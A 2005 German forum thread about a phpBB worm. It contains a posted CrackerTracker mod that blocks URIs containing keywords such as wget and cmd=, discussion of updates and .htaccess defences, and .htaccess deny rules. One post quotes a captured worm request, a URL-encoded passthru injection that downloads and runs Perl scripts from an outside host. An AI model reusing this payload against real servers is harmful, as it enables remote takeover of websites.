Neue Version vom php(BB?)-Wurm

Beitrag von **Fr34k** » 16.02.2005, 12:44

Ich hab gestern auf phpBB2.de einen Tracker gefunden, der die Angriffe wohl mitloggt und gleichzeitig vorrübergehen die IP wohl blockt.

Mod-Beschreibung:
Dieser MOD Blockt einige gängige Wurmattacken auf phpBB Foren. Denn auch wenn DU ein sicheres phpBB 2.0.11 im Einsatz hast verursachen diese Wurmattacken bremsende und unnötige Datenbankabfragen und viel Traffic. Dieser MOD blockiert Wurmzugriff auf Dein Board, die Dateien schützen sich dynamisch, somit sind auch ständig wechselnde IPs kein Problem mehr. Außerdem wird ein kleiner Angriffslog erstellt.

Code: Alles auswählen

##############################################################
## MOD Title&#58;        CBACK CrackerTracker
## MOD Author&#58;       CBACK < sonny@cback.de > &#40;Christian Knerr&#41; http&#58;//www.cback.de
## MOD Description&#58;  Dieser MOD Blockt einige gängige Wurmattacken
##                   auf phpBB Foren. Denn auch wenn DU ein
##                   sicheres phpBB 2.0.11 im Einsatz hast verursachen diese
##                   Wurmattacken bremsende und unnötige Datenbankabfragen
##                   und viel Traffic.
##                   Dieser MOD blockiert Wurmzugriff auf Dein Board, die Dateien
##                   schützen sich dynamisch, somit sind auch ständig wechselnde IPs
##                   kein Problem mehr. Außerdem wird ein kleiner Angriffslog erstellt.
## MOD Version&#58;      1.0.3
##
## Installation Level&#58; Easy
## Installation Time&#58;  8 Minutes
## Files To Edit&#58;      10
##                     admin/page_header_admin.php
##                     index.php
##                     faq.php
##                     login.php
##                     memberlist.php
##                     profile.php
##                     search.php
##                     templates/subSilver/admin/index_navigate.tpl
##                     viewforum.php
##                     viewtopic.php
## Included Files&#58;     - ctrack.txt
##                     - admin/ctrack_stat.php
##                     - templates/subSilver/admin/ctrack_stat.tpl
##############################################################
## For Security Purposes, Please Check&#58; http&#58;//www.phpbb.com/mods/downloads/ for the
## latest version of this MOD. Downloading this MOD from other sites could cause malicious code
## to enter into your phpBB Forum. As such, phpBB will not offer support for MODs not offered
## in our MOD-Database, located at&#58; http&#58;//www.phpbb.com/mods/downloads/
##############################################################
## MOD History&#58;
##
##   2005-01-03 - Version 1.0.3
##	- Release 4 fix&#58; Register Globals OFF
##                     "QuickMethod" included
##
##   2004-12-30 - Version 1.0.2
##	- Release 3 with new LogFile Management
##
##   2004-12-27 - Version 1.0.1
##	- Release 2 with better Logfile Management
##
##   2004-12-26 - Version 1.0.0
##	- First release with better protection
##
##   2004-12-25 - Version 0.0.1
##	- Preview Version
##
##############################################################
## Before Adding This MOD To Your Forum, You Should Back Up All Files Related To This MOD
##############################################################
#
#-----&#91; COPY &#93;------------------------------------------
#
  ctrack.txt                                     >>   ctrack.txt
  admin/ctrack_stat.php                          >>   admin/ctrack_stat.php
  templates/subSilver/admin/ctrack_stat.tpl      >>   templates/subSilver/admin/ctrack_stat.tpl


#
#-----&#91; FTP-COMMAND &#93;------------------------------------------
#
  Set CHMOD777 with your FTP Program on the file ctracker.txt in the root
  Directory of your forum! The Hacking-Logs will be saved in this file.


#
#-----&#91; OPEN &#93;------------------------------------------
#
faq.php


#
#-----&#91; FIND &#93;------------------------------------------
#
define&#40;'IN_PHPBB', true&#41;;


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker
// Worm Protection System
//
  $cbackcracktrack = $_SERVER&#91;'REQUEST_URI'&#93;;
  // Checking for already known Worm Attacks
  $checkworm1 = str_replace&#40;"chr&#40;", "*", "$cbackcracktrack"&#41;;
  $checkworm2 = str_replace&#40;"wget", "*", "$checkworm1"&#41;;
  $checkworm3 = str_replace&#40;"cmd=", "*", "$checkworm2"&#41;;
  $checkworm4 = str_replace&#40;"rush=", "*", "$checkworm3"&#41;;

if &#40;$cbackcracktrack == $checkworm4&#41;
  &#123;
//
// End Check-Code of CBACK CrackerTracker
//


#
#-----&#91; FIND &#93;------------------------------------------
#
?>


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker Worm Protection Part2
//
  &#125;
else
  &#123;
    $cremotead = $_SERVER&#91;'REMOTE_ADDR'&#93;;
    $cuseragent = $_SERVER&#91;'HTTP_USER_AGENT'&#93;;
    $cstampdate = date&#40;dmy&#41;;
    $cstamptime = time&#40;&#41;;
    $ctrackerlog = "$cstamptime,$cstampdate,$cremotead,$cbackcracktrack,$cuseragent";
    $clog = fopen&#40;'ctrack.txt', 'a'&#41;;
    fwrite&#40;$clog,$ctrackerlog."\n"&#41;;
    fclose&#40;$clog&#41;;
    echo "Du Wurm! <br /><br /><b>Dieser Angriff wurde geloggt&#58;</b><br />$ctrackerlog";
  &#125;
//
// Worms armageddon ;&#41;
//


#
#-----&#91; OPEN &#93;------------------------------------------
#
index.php


#
#-----&#91; FIND &#93;------------------------------------------
#
define&#40;'IN_PHPBB', true&#41;;


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker
// Worm Protection System
//
  $cbackcracktrack = $_SERVER&#91;'REQUEST_URI'&#93;;
  // Checking for already known Worm Attacks
  $checkworm1 = str_replace&#40;"chr&#40;", "*", "$cbackcracktrack"&#41;;
  $checkworm2 = str_replace&#40;"wget", "*", "$checkworm1"&#41;;
  $checkworm3 = str_replace&#40;"cmd=", "*", "$checkworm2"&#41;;
  $checkworm4 = str_replace&#40;"rush=", "*", "$checkworm3"&#41;;

if &#40;$cbackcracktrack == $checkworm4&#41;
  &#123;
//
// End Check-Code of CBACK CrackerTracker
//


#
#-----&#91; FIND &#93;------------------------------------------
#
?>


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker Worm Protection Part2
//
  &#125;
else
  &#123;
    $cremotead = $_SERVER&#91;'REMOTE_ADDR'&#93;;
    $cuseragent = $_SERVER&#91;'HTTP_USER_AGENT'&#93;;
    $cstampdate = date&#40;dmy&#41;;
    $cstamptime = time&#40;&#41;;
    $ctrackerlog = "$cstamptime,$cstampdate,$cremotead,$cbackcracktrack,$cuseragent";
    $clog = fopen&#40;'ctrack.txt', 'a'&#41;;
    fwrite&#40;$clog,$ctrackerlog."\n"&#41;;
    fclose&#40;$clog&#41;;
    echo "Du Wurm! <br /><br /><b>Dieser Angriff wurde geloggt&#58;</b><br />$ctrackerlog";
  &#125;
//
// Worms armageddon ;&#41;
//


#
#-----&#91; OPEN &#93;------------------------------------------
#
login.php


#
#-----&#91; FIND &#93;------------------------------------------
#
define&#40;"IN_LOGIN", true&#41;;


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker
// Worm Protection System
//
  $cbackcracktrack = $_SERVER&#91;'REQUEST_URI'&#93;;
  // Checking for already known Worm Attacks
  $checkworm1 = str_replace&#40;"chr&#40;", "*", "$cbackcracktrack"&#41;;
  $checkworm2 = str_replace&#40;"wget", "*", "$checkworm1"&#41;;
  $checkworm3 = str_replace&#40;"cmd=", "*", "$checkworm2"&#41;;
  $checkworm4 = str_replace&#40;"rush=", "*", "$checkworm3"&#41;;

if &#40;$cbackcracktrack == $checkworm4&#41;
  &#123;
//
// End Check-Code of CBACK CrackerTracker
//


#
#-----&#91; FIND &#93;------------------------------------------
#
?>


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker Worm Protection Part2
//
  &#125;
else
  &#123;
    $cremotead = $_SERVER&#91;'REMOTE_ADDR'&#93;;
    $cuseragent = $_SERVER&#91;'HTTP_USER_AGENT'&#93;;
    $cstampdate = date&#40;dmy&#41;;
    $cstamptime = time&#40;&#41;;
    $ctrackerlog = "$cstamptime,$cstampdate,$cremotead,$cbackcracktrack,$cuseragent";
    $clog = fopen&#40;'ctrack.txt', 'a'&#41;;
    fwrite&#40;$clog,$ctrackerlog."\n"&#41;;
    fclose&#40;$clog&#41;;
    echo "Du Wurm! <br /><br /><b>Dieser Angriff wurde geloggt&#58;</b><br />$ctrackerlog";
  &#125;
//
// Worms armageddon ;&#41;
//


#
#-----&#91; OPEN &#93;------------------------------------------
#
memberlist.php


#
#-----&#91; FIND &#93;------------------------------------------
#
define&#40;'IN_PHPBB', true&#41;;


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker
// Worm Protection System
//
  $cbackcracktrack = $_SERVER&#91;'REQUEST_URI'&#93;;
  // Checking for already known Worm Attacks
  $checkworm1 = str_replace&#40;"chr&#40;", "*", "$cbackcracktrack"&#41;;
  $checkworm2 = str_replace&#40;"wget", "*", "$checkworm1"&#41;;
  $checkworm3 = str_replace&#40;"cmd=", "*", "$checkworm2"&#41;;
  $checkworm4 = str_replace&#40;"rush=", "*", "$checkworm3"&#41;;

if &#40;$cbackcracktrack == $checkworm4&#41;
  &#123;
//
// End Check-Code of CBACK CrackerTracker
//


#
#-----&#91; FIND &#93;------------------------------------------
#
?>


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker Worm Protection Part2
//
  &#125;
else
  &#123;
    $cremotead = $_SERVER&#91;'REMOTE_ADDR'&#93;;
    $cuseragent = $_SERVER&#91;'HTTP_USER_AGENT'&#93;;
    $cstampdate = date&#40;dmy&#41;;
    $cstamptime = time&#40;&#41;;
    $ctrackerlog = "$cstamptime,$cstampdate,$cremotead,$cbackcracktrack,$cuseragent";
    $clog = fopen&#40;'ctrack.txt', 'a'&#41;;
    fwrite&#40;$clog,$ctrackerlog."\n"&#41;;
    fclose&#40;$clog&#41;;
    echo "Du Wurm! <br /><br /><b>Dieser Angriff wurde geloggt&#58;</b><br />$ctrackerlog";
  &#125;
//
// Worms armageddon ;&#41;
//


#
#-----&#91; OPEN &#93;------------------------------------------
#
profile.php


#
#-----&#91; FIND &#93;------------------------------------------
#
define&#40;'IN_PHPBB', true&#41;;


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker
// Worm Protection System
//
  $cbackcracktrack = $_SERVER&#91;'REQUEST_URI'&#93;;
  // Checking for already known Worm Attacks
  $checkworm1 = str_replace&#40;"chr&#40;", "*", "$cbackcracktrack"&#41;;
  $checkworm2 = str_replace&#40;"wget", "*", "$checkworm1"&#41;;
  $checkworm3 = str_replace&#40;"cmd=", "*", "$checkworm2"&#41;;
  $checkworm4 = str_replace&#40;"rush=", "*", "$checkworm3"&#41;;

if &#40;$cbackcracktrack == $checkworm4&#41;
  &#123;
//
// End Check-Code of CBACK CrackerTracker
//


#
#-----&#91; FIND &#93;------------------------------------------
#
?>


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker Worm Protection Part2
//
  &#125;
else
  &#123;
    $cremotead = $_SERVER&#91;'REMOTE_ADDR'&#93;;
    $cuseragent = $_SERVER&#91;'HTTP_USER_AGENT'&#93;;
    $cstampdate = date&#40;dmy&#41;;
    $cstamptime = time&#40;&#41;;
    $ctrackerlog = "$cstamptime,$cstampdate,$cremotead,$cbackcracktrack,$cuseragent";
    $clog = fopen&#40;'ctrack.txt', 'a'&#41;;
    fwrite&#40;$clog,$ctrackerlog."\n"&#41;;
    fclose&#40;$clog&#41;;
    echo "Du Wurm! <br /><br /><b>Dieser Angriff wurde geloggt&#58;</b><br />$ctrackerlog";
  &#125;
//
// Worms armageddon ;&#41;
//


#
#-----&#91; OPEN &#93;------------------------------------------
#
search.php


#
#-----&#91; FIND &#93;------------------------------------------
#
define&#40;'IN_PHPBB', true&#41;;


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker
// Worm Protection System
//
  $cbackcracktrack = $_SERVER&#91;'REQUEST_URI'&#93;;
  // Checking for already known Worm Attacks
  $checkworm1 = str_replace&#40;"chr&#40;", "*", "$cbackcracktrack"&#41;;
  $checkworm2 = str_replace&#40;"wget", "*", "$checkworm1"&#41;;
  $checkworm3 = str_replace&#40;"cmd=", "*", "$checkworm2"&#41;;
  $checkworm4 = str_replace&#40;"rush=", "*", "$checkworm3"&#41;;

if &#40;$cbackcracktrack == $checkworm4&#41;
  &#123;
//
// End Check-Code of CBACK CrackerTracker
//


#
#-----&#91; FIND &#93;------------------------------------------
#
?>


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker Worm Protection Part2
//
  &#125;
else
  &#123;
    $cremotead = $_SERVER&#91;'REMOTE_ADDR'&#93;;
    $cuseragent = $_SERVER&#91;'HTTP_USER_AGENT'&#93;;
    $cstampdate = date&#40;dmy&#41;;
    $cstamptime = time&#40;&#41;;
    $ctrackerlog = "$cstamptime,$cstampdate,$cremotead,$cbackcracktrack,$cuseragent";
    $clog = fopen&#40;'ctrack.txt', 'a'&#41;;
    fwrite&#40;$clog,$ctrackerlog."\n"&#41;;
    fclose&#40;$clog&#41;;
    echo "Du Wurm! <br /><br /><b>Dieser Angriff wurde geloggt&#58;</b><br />$ctrackerlog";
  &#125;
//
// Worms armageddon ;&#41;
//


#
#-----&#91; OPEN &#93;------------------------------------------
#
viewforum.php


#
#-----&#91; FIND &#93;------------------------------------------
#
define&#40;'IN_PHPBB', true&#41;;


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker
// Worm Protection System
//
  $cbackcracktrack = $_SERVER&#91;'REQUEST_URI'&#93;;
  // Checking for already known Worm Attacks
  $checkworm1 = str_replace&#40;"chr&#40;", "*", "$cbackcracktrack"&#41;;
  $checkworm2 = str_replace&#40;"wget", "*", "$checkworm1"&#41;;
  $checkworm3 = str_replace&#40;"cmd=", "*", "$checkworm2"&#41;;
  $checkworm4 = str_replace&#40;"rush=", "*", "$checkworm3"&#41;;

if &#40;$cbackcracktrack == $checkworm4&#41;
  &#123;
//
// End Check-Code of CBACK CrackerTracker
//


#
#-----&#91; FIND &#93;------------------------------------------
#
?>


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker Worm Protection Part2
//
  &#125;
else
  &#123;
    $cremotead = $_SERVER&#91;'REMOTE_ADDR'&#93;;
    $cuseragent = $_SERVER&#91;'HTTP_USER_AGENT'&#93;;
    $cstampdate = date&#40;dmy&#41;;
    $cstamptime = time&#40;&#41;;
    $ctrackerlog = "$cstamptime,$cstampdate,$cremotead,$cbackcracktrack,$cuseragent";
    $clog = fopen&#40;'ctrack.txt', 'a'&#41;;
    fwrite&#40;$clog,$ctrackerlog."\n"&#41;;
    fclose&#40;$clog&#41;;
    echo "Du Wurm! <br /><br /><b>Dieser Angriff wurde geloggt&#58;</b><br />$ctrackerlog";
  &#125;
//
// Worms armageddon ;&#41;
//


#
#-----&#91; OPEN &#93;------------------------------------------
#
viewtopic.php


#
#-----&#91; FIND &#93;------------------------------------------
#
define&#40;'IN_PHPBB', true&#41;;


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker
// Worm Protection System
//
  $cbackcracktrack = $_SERVER&#91;'REQUEST_URI'&#93;;
  // Checking for already known Worm Attacks
  $checkworm1 = str_replace&#40;"chr&#40;", "*", "$cbackcracktrack"&#41;;
  $checkworm2 = str_replace&#40;"wget", "*", "$checkworm1"&#41;;
  $checkworm3 = str_replace&#40;"cmd=", "*", "$checkworm2"&#41;;
  $checkworm4 = str_replace&#40;"rush=", "*", "$checkworm3"&#41;;

if &#40;$cbackcracktrack == $checkworm4&#41;
  &#123;
//
// End Check-Code of CBACK CrackerTracker
//


#
#-----&#91; FIND &#93;------------------------------------------
#
?>


#
#-----&#91; BEFORE, ADD &#93;------------------------------------------
#
//
// CBACK CrackerTracker Worm Protection Part2
//
  &#125;
else
  &#123;
    $cremotead = $_SERVER&#91;'REMOTE_ADDR'&#93;;
    $cuseragent = $_SERVER&#91;'HTTP_USER_AGENT'&#93;;
    $cstampdate = date&#40;dmy&#41;;
    $cstamptime = time&#40;&#41;;
    $ctrackerlog = "$cstamptime,$cstampdate,$cremotead,$cbackcracktrack,$cuseragent";
	$cfilesize = count&#40;file&#40;"ctrack.txt"&#41;&#41;;
	if &#40;$cfilesize > 200&#41; // You can change the value 200 &#40;count of maximum entries in LogFile&#41;
	&#123;
	$clog = fopen&#40;"ctrack.txt", "a"&#41;;
	ftruncate&#40;$clog, '0'&#41;;
	fwrite&#40;$clog, "AUTOMATIC LOG FILE RESET&#58; ".date&#40;r&#41;." -- CBACK CrackerTracker \n"&#41;;
	fclose&#40;$clog&#41;;
	&#125;
	else
	&#123;
    $clog = fopen&#40;'ctrack.txt', 'a'&#41;;
    fwrite&#40;$clog,$ctrackerlog."\n"&#41;;
    fclose&#40;$clog&#41;;
    &#125;
    echo "Du Wurm! <br /><br /><b>Dieser Angriff wurde geloggt&#58;</b><br />$ctrackerlog";
  &#125;
//
// Worms armageddon ;&#41;
//


#
#-----&#91; OPEN &#93;------------------------------------------
#
admin/page_header_admin.php


#
#-----&#91; FIND &#93;------------------------------------------
#
'U_INDEX' => append_sid&#40;'../index.'.$phpEx&#41;,


#
#-----&#91; AFTER, ADD &#93;------------------------------------------
#
'U_CTRACK' => append_sid&#40;'ctrack_stat.'.$phpEx.'?pane=right'&#41;,


#
#-----&#91; OPEN &#93;------------------------------------------
#
templates/subSilver/admin/index_navigate.tpl


#
#-----&#91; FIND &#93;------------------------------------------
#
		<tr>
		  <td class="row1"><span class="genmed"><a href="&#123;U_FORUM_INDEX&#125;" target="main" class="genmed">&#123;L_PREVIEW_FORUM&#125;</a></span></td>
		</tr>


#
#-----&#91; AFTER, ADD &#93;------------------------------------------
#
		<tr>
		  <td class="row1"><span class="genmed"><a href="&#123;U_CTRACK&#125;" target="main" class="genmed">CrackerTracker</a></span></td>
		</tr>

#
#-----&#91; SAVE/CLOSE ALL FILES &#93;------------------------------------------
#
# EoM
# Generator&#58; CBACK MIRO ModEditor &#40;http&#58;//www.cback.de&#41;

Grüsse vom Fr34k

von **Anzeige von ABAKUS** »

Beitrag von **hmueller** » 16.02.2005, 13:52

larsneo hat geschrieben: ...was ja auch kein grosses wunder ist, da der code völliger mumpitz ist (und die gesamte keyword-funktionalität aushebelt)

was meinst Du damit?

Beitrag von **proxxyd** » 18.02.2005, 23:56

Wenn Du phpbb 2.0.11 installiert hast, brauchst Du den Code nicht einbauen

so, ich habe eine 2.0.11 und die ist dem wurm auch nicht sicher.

Beitrag von **Boa** » 19.02.2005, 00:29

Seid ich den Code drinhabe ist Ruhe. Ob der nun die gesamte keyword-Funktionalität aushebelt wie hier behauptet wird kann ich nicht nachvollziehen.

Beitrag von **larsneo** » 19.02.2005, 13:37

so, ich habe eine 2.0.11 und die ist dem wurm auch nicht sicher.

falsch. der wurm kann das exploit definitv nicht mehr ausnutzen - er wird aber natürlich nicht an entsprechenden anfragen gehindert (und das kann unter umständen massiv traffic verursachen). aus diesem grund noch einmal der hinweis auf *diese .htaccess die 'typische' wurmanfragen nach 127.0.0.1 umleiten (und damit sogar den traffic für eine eigentlich korrektere 'access denied' seite einspart.

Seid ich den Code drinhabe ist Ruhe. Ob der nun die gesamte keyword-Funktionalität aushebelt wie hier behauptet wird kann ich nicht nachvollziehen.

probier' es doch einfach aus. vom sicherheitsgedanken her sollte man mögliche angriffe immer so frühzeitig wie möglich stoppen - am besten wäre es in diesem fall direkt auf serverebene (z.b. durch den einsatz von mod_security) die anfragen zu blocken - da dies in den allermeisten fällen aber wohl nicht möglich sein wird ist die nächste variante die umleitung der anfragen in der httpd.conf bzw. eben der .htaccess. die varianten mit dem cback-tracker bzw. der anpassung der viewtopic sind von daher imho definitiv die schlechtesten lösungen.

Beitrag von **olli** » 20.02.2005, 22:16

Hallo, kann jemand das mal zusammen fassen, ich bin jetzt etwas verwirrt, was ist den nun ausser
dem Update der Königsweg, und wie sieht das komplette Url rewriting denn nun richtig aus.

olli

Beitrag von **larsneo** » 20.02.2005, 22:41

am update führt kein weg vorbei - neben dem highlight exploit wurden einige weitere schwachstellen gefixt (die wenn auch bislang glücklicherweise noch nicht wirklich gut dokumentiert trotzdem eine potentielle gefahr darstelllen).
die .htaccess die vor traffic schützt (aber keinen wirklich schutz vor dem wurm bringt) habe ich bereits verlinkt.

Beitrag von **Ice Man** » 01.03.2005, 20:32

es gibt wieder ne neue Version

ftopic34.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/var/tmp;wget%20www.panahi.com/frame3.txt;wget%20www.panahi.com/frame2.txt;perl%20frame3.txt;rm%20frame3.txt;perl%20frame2.txt;rm%20frame2.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

kann mal jemand dafür die .htaccess anpassen

Beitrag von **larsneo** » 01.03.2005, 20:57

sollte die ursprüngliche .htaccess bei phpbb.de eigentlich abfangen...

Beitrag von **Ice Man** » 01.03.2005, 21:04

die hab ich drin, aber der Wurm ist durch gekommen.
Der Wurm Mod hat ihn abgefangen und geloggt.

Die hab ich

RewriteCond %{QUERY_STRING} .*esystem.* [NC,OR]
RewriteCond %{QUERY_STRING} .*echr.* [NC,OR]
RewriteCond %{QUERY_STRING} .*passthru.* [NC,OR]
RewriteCond %{QUERY_STRING} %70%61%73%73%74%68%72%75
RewriteRule .* - [F,L]